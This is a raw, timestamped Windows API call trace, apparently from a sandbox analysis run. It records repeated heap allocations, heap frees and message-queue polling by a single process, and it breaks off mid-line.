[0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.668] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.668] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fefd8 [0121.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefd8 | out: hHeap=0x12c0000) returned 1 [0121.669] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.669] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.669] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.669] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.670] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.670] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0121.670] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0121.671] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0121.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.671] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.672] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0121.672] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0121.672] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.672] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.673] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0121.673] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0121.673] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0121.674] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0121.674] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.674] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.674] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.675] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.675] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.675] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.675] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.675] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.676] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.676] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.676] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.676] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.677] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.677] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.677] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.678] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.678] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.678] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.678] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.679] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.679] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.680] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.680] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.680] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.681] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 